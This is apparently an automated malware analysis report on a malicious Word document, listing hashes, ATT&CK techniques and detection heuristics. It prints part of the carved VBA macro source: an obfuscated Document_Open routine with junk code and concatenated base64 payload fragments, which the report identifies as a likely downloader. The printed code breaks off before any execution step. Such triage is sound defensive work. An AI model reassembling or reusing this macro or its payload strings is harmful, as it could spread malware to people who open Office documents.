Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b25fd83e8f9e34a…

MALICIOUS

Office (OLE)

1.38 MB Created: 2018-05-01 19:41:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: a5a0658edc3a48340679a94c80051b8a SHA-1: 6bac79969a8eefd281b254b735c45b82ad9e5c21 SHA-256: 3b25fd83e8f9e34a4ee66ba78aade5cf75ae8643716dc3a736b258b48120b376
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a Document_Open macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. This is further supported by the presence of VBA p-code auto-execution with execution tokens. The macro's obfuscated nature and the presence of a long encoded blob suggest it is designed to download and execute a second-stage payload, characteristic of a downloader malware.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 59408 bytes
SHA-256: e09dd843fbe2255fd3e9361c64e51a7baa89f8232333d4ea94738931ddfab321
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim gYcRJb
gYcRJb = 165
While gYcRJb < 871
gYcRJb = gYcRJb + 38
Wend
cezrcExD = 19944
rnmrZ = yK2Y5ZOM8 & gYcRJb
If 78 + 123 = 19650 / 1310 Then
aYI1Nv = "ALzgH"
End If
ykMStc9i = "DXOxr2Zc"
cLEY2S4NI = aYI1Nv & ykMStc9i
Dim RtfQK
RtfQK = 165
While RtfQK <= 871
RtfQK = RtfQK + 38
Wend
ozUXSY3s = 19944
Z6Qqk3dF7 = gSgQDWTyv & RtfQK
If 78 + 123 = 19650 / 1310 Then
UBL6tS = "lq1D8"
End If
TJl7UQPd = 19944
HPy4tv = UBL6tS & TJl7UQPd
If 26356 / 44 = 1696 - 1680 Then
SMWVZO = "jlcKx"
End If
gsLqGxrV = "bWlCT6"
vKhp5nJ = SMWVZO & gsLqGxrV
If 26356 / 44 = 1696 - 1680 Then
zZlqbxWgM = "azNGeQCDj"
End If
LDnICL = 35453
LAP84mrNY = zZlqbxWgM & LDnICL
Dim kyRSsP2UC
kyRSsP2UC = 2
While kyRSsP2UC <= 355
kyRSsP2UC = kyRSsP2UC + 19
Wend
Z94OZ = "o8TGin"
stSJAd = UyIWPm & kyRSsP2UC
Dim nPE6dujW8
nPE6dujW8 = 2
While nPE6dujW8 < 355
nPE6dujW8 = nPE6dujW8 + 19
Wend
g8m74xo = "N8Skt"
IyGwv9 = VOFKQe5IX & nPE6dujW8
If 52 * 9 = -1002 + 1017 Then
rBLhj8 = "TOAwj6"
End If
gRqJm = 29947
MKWdV3L = rBLhj8 & gRqJm
ktxhPmp4 = "a3VkbVZ5YzJsdmJqc2thMkZ"
YdimkHO = "6YW5KT1Z6Z2dQU0FuYlU5c2RtbElNV1psSnpza2QyMTZNbTR1YUdWaFpHVnljMXNuZFhObGNp"
CLjWxAH = "MWhaMlZ1ZENkZElEMGdKRWxMV2psMFJXTTdKSE5pVTFCNk1tY2dQU0FuWVZKTlp6TW5PeVJKUzFvNWRFVmpMbU5zYjNObEtDazdKSE0zWTNOTklEMGdKMjFWWlZaa0p6c2tTVXRhT1hSRll5NXhkV2wwT3lSTlZtUlhieUE5SUNkWG"
yC9HiOL = "FHZHllSEZWSnpza1duQllVWEY2Y3lBOUlDUm"
Dim WNLHGVIQv
WNLHGVIQv = 223
While WNLHGVIQv <= 359
WNLHGVIQv = WNLHGVIQv + 13
Wend
rz1bea2yj = "IYCmiOgX"
Nkxr8MHOR = yKTh5 & WNLHGVIQv
If 826 + 37 = -5511 + 5512 Then
y2g8WFnC = "FaD2ktr"
End If
NnABWz = 42991
rK59xtRUr = y2g8WFnC & NnABWz
Dim MsYdOxP3
MsYdOxP3 = 223
While MsYdOxP3 <= 359
MsYdOxP3 = MsYdOxP3 + 13
Wend
d58a40l = "lpuXf"
BE6lz0Y = KiNn5EF & MsYdOxP3
Dim fW2mkbN
fW2mkbN = 223
While fW2mkbN < 359
fW2mkbN = fW2mkbN + 13
Wend
cIo7Wes = "OCTWtFUN9"
jauD3Qo2 = EAr9FCsI & fW2mkbN
Dim BzrM2nmp
BzrM2nmp = 83
While BzrM2nmp < 361
BzrM2nmp = BzrM2nmp + 24
Wend
icBKsG4 = "y8QMHdyWU"
fgpyXCPd = Zo4LdZY52 & BzrM2nmp
Dim i3CXeDBT
i3CXeDBT = 83
While i3CXeDBT < 361
i3CXeDBT = i3CXeDBT + 24
Wend
aOrAiqRt = 28101
zpIrQ = JCjvwhn & i3CXeDBT
If 61 + 131 = 10450 / 950 Then
iN1azt = "Xdj0ZF"
End If
dxM7CgR = "irNREBHm"
hxzfiN = iN1azt & dxM7CgR
Dim SFAKT7cQe
SFAKT7cQe = 27
While SFAKT7cQe <= 378
SFAKT7cQe = SFAKT7cQe + 22
Wend
nzYlK = 48852
zbfkRAQ7 = Z6tm8RhQ & SFAKT7cQe
If 61 + 131 = 10450 / 950 Then
PIUSLvn = "wNOQy40C"
End If
JtJWsbU = "qf9LlVT"
xmQF5fp2 = PIUSLvn & JtJWsbU
If 38 < 236 Then
' dZHtJu
Else
' BuNrl4M
MsgBox "WFy12uReG"
End If
If 833 - 13 = 24970 / 4994 Then
FCVc8i6E = "wCV8hI4js"
End If
wFAvxr = "o7hfi6c9"
Nr4Td3p = FCVc8i6E & wFAvxr
If 833 - 13 = 24970 / 4994 Then
Xmylws = "xc8y0P73"
End If
H2FdCpDHq = 60726
nx6W2yF = Xmylws & H2FdCpDHq
Dim wuR7v
wuR7v = ktxhPmp4 & YdimkHO & CLjWxAH & yC9HiOL
o97oaKG = "kzUW5PeVIzYlhveW"
SI2lAhQNf = "JpNUViM2R1Ykc5aFpFWnBiR1VvSkZCNlZuWlFSazFDVnk1VWIxTjBjbWx1WnlncExDQWtXbkJZVVhGNmN5azdKRnAxYzB4SlJXY2dQU0FuVFhadlYyTlVVU2M3VTNSaGNuUXRVSEp2WTJWemN5QWtXbkJZVVhGNmN6c2tiVTVXYjNZM0lEMGdKMU5UWTBSV1MyUW5P"
a3uOS = "Mkp5WldGck8zMWpZWFJqYUhza1psQmpSMnBrSUQwZ0oyNVVNbEZhVnljN2ZTU"
XgsZB5 = "nZjVzF5VWtOTVZVa2d"
ezMbmZ = "QU0FuV2tONWREWW5PMzA9"
If 997 - 9 = -1905 + 1919 Then
gcy547Sk = "WXYc2iHKO"
End If
LncNY = "gInqVpZR"
YBnp1y = gcy547Sk & LncNY
If 18 < 129 Then
' Shl8cI
Else
' VysnxYV
MsgBox "CQulK7mn"
End If
If 62 < 216 Then
' nEWwfL3i
Else
' MxcyHU
MsgBox "v6lt9ar"
End If
If 62 < 216 Then
' nXlFRbgAG
Else
' eSzLN
MsgBox "Q29sb"
End If
If 547 - 17 = 20 - 8 Then
bHx0hv = "XHvfW5by"
End If
FPhdDS = "u5jA7n"
nzvCBYpI = bHx0hv & FPhdDS
Dim IPSYL6
IPSYL6 = 47
While IPSYL6 < 291
IPSYL6 = I
... (truncated)